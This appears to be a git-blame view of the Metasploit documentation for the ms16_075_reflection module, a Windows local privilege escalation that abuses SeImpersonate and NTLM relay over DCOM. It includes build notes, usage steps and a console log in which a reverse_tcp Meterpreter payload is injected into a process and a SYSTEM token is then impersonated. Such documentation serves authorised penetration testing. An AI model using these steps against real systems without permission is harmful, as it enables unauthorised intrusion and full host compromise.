2019-09-30 16:58:00 -05:00
|
|
|
## Introduction
|
2020-01-28 14:28:18 -05:00
|
|
|
|
|
|
|
|
This module will abuse the SeImperonsate privilege commonly found in
|
|
|
|
|
services due to the requirement to impersonate a client upon
|
|
|
|
|
authentication. As such it is possible to impersonate the SYSTEM account
|
|
|
|
|
and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
|
|
|
|
|
attack at which intercepts the hash and relay responses from RPC to be
|
|
|
|
|
able to establish a handle to a new SYSTEM token. Some caveats : Set
|
|
|
|
|
your target option to match the architecture of your Meterpreter
|
|
|
|
|
session, else it will inject the wrong architecture DLL into the process
|
|
|
|
|
of a seperate architecture. Additionally, after you have established a
|
2018-10-04 16:42:23 -05:00
|
|
|
session, you must use incognito to imperonsate the SYSTEM Token.
|
|
|
|
|
|
|
|
|
|
## Build Instructions
|
2020-01-28 14:28:18 -05:00
|
|
|
|
2018-10-04 16:42:23 -05:00
|
|
|
This builds using visual studio 2017 and tools v141. Attempts
|
|
|
|
|
to compile with previous verstions of build tools will succeed but
|
|
|
|
|
the resulting binary fails to exploit the vulnerability.
|
|
|
|
|
|
|
|
|
|
## Usage
|
2020-01-28 14:28:18 -05:00
|
|
|
|
2018-10-04 16:42:23 -05:00
|
|
|
You'll first need to obtain a session on the target system.
|
2020-01-28 14:28:18 -05:00
|
|
|
Next, once the module is loaded, one simply needs to set the
|
2018-10-04 16:42:23 -05:00
|
|
|
```payload``` and ```session``` options, in addition to architecture.
|
2020-01-28 14:28:18 -05:00
|
|
|
|
|
|
|
|
Your user at which you are trying to exploit must have `SeImpersonate`
|
2018-10-04 16:42:23 -05:00
|
|
|
privileges.
|
2020-01-28 14:28:18 -05:00
|
|
|
|
|
|
|
|
The module has a hardcoded timeout of 20 seconds, as the attack may
|
|
|
|
|
not work immediately and take a few seconds to start. Also, check to
|
|
|
|
|
make sure port 6666 is inherently not in use else the exploit will not
|
|
|
|
|
run properly.
|
|
|
|
|
|
2020-01-16 10:36:38 -05:00
|
|
|
## Scenarios
|
2020-01-28 14:28:18 -05:00
|
|
|
|
2018-10-04 16:42:23 -05:00
|
|
|
```
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
SESSION 48 yes The session to run this module on. Payload options
|
|
|
|
|
(windows/x64/meterpreter/reverse_tcp):
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread,
|
|
|
|
|
process, none)
|
|
|
|
|
LHOST ens3 yes The listen address (an interface may be specified)
|
|
|
|
|
LPORT 3312 yes The listen port Exploit target:
|
|
|
|
|
Id Name
|
|
|
|
|
-- ----
|
|
|
|
|
1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run
|
|
|
|
|
[*] Started reverse TCP handler on -snip-:3312
|
|
|
|
|
[*] Launching notepad to host the exploit... [+] Process 3564 launched.
|
|
|
|
|
[*] Reflectively injecting the exploit DLL into 3564...
|
|
|
|
|
[*] Injecting exploit into 3564...
|
|
|
|
|
[*] Exploit injected. Injecting payload into 3564...
|
|
|
|
|
[*] Payload injected. Executing exploit..
|
|
|
|
|
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
|
|
|
|
|
[*] Sending stage (206403 bytes) to -snip-
|
|
|
|
|
[*] Meterpreter session 49 opened (-snip-:3312 -> -snip-:55306) at 2018-08-03 01:54:18 -0400
|
|
|
|
|
meterpreter > load incognito
|
|
|
|
|
Loading extension incognito...Success.
|
|
|
|
|
meterpreter > impersonate_token
|
|
|
|
|
'NT AUTHORITY\SYSTEM'
|
|
|
|
|
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
|
|
|
|
|
Call rev2self if primary process token is SYSTEM
|
|
|
|
|
[-] No delegation token available
|
|
|
|
|
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
|
|
|
|
|
meterpreter > getsystem -t 1 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
|
|
|
|
|
meterpreter >
|
|
|
|
|
```
|
